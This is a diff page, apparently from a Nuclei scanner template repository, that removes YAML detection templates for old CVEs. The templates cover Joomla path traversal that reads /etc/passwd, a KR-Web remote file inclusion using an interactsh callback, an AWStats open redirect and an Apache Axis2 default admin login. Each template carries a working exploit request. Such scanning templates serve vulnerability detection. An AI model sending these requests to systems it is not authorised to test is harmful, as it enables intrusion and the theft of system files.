description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-2100
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Agora 3.0.0b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-3053
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
|
||||
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
|
||||
classification:
|
||||
cve-id: CVE-2009-3318
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- http://www.vupen.com/english/advisories/2009/1494
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
|
||||
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
|
||||
classification:
|
||||
cve-id: CVE-2009-4202
|
||||
tags: cve2009,joomla,lfi,photo,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <=1.1b2 - Remote File Inclusion
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
|
||||
- http://www.exploit-db.com/exploits/10216
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4223
|
||||
classification:
|
||||
cve-id: CVE-2009-4223
|
||||
tags: cve,cve2009,krweb,rfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/06/06
|
|
@ -1,34 +0,0 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Portfolio Nexus - Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: |
|
||||
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
|
||||
- http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
|
||||
classification:
|
||||
cve-id: CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi,nexus,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,31 +0,0 @@
|
|||
id: CVE-2009-5020
|
||||
|
||||
info:
|
||||
name: AWStats < 6.95 - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
|
||||
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2009,redirect,awstats
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
- http://websecurity.com.ua/2628/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2009-5114
|
||||
tags: edb,cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
- http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi,edb,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,53 +0,0 @@
|
|||
id: CVE-2010-0219
|
||||
|
||||
info:
|
||||
name: Apache Axis2 Default Login
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
|
||||
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
|
||||
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
|
||||
- http://www.vupen.com/english/advisories/2010/2673
|
||||
classification:
|
||||
cve-id: CVE-2010-0219
|
||||
metadata:
|
||||
shodan-query: http.html:"Apache Axis"
|
||||
tags: cve,cve2010,axis,apache,default-login,axis2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginUsername={{username}}&loginPassword={{password}}
|
||||
|
||||
- |
|
||||
POST /axis2/axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
userName={{username}}&password={{password}}&submit=+Login+
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- axis2
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
- http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
|
||||
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.8
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue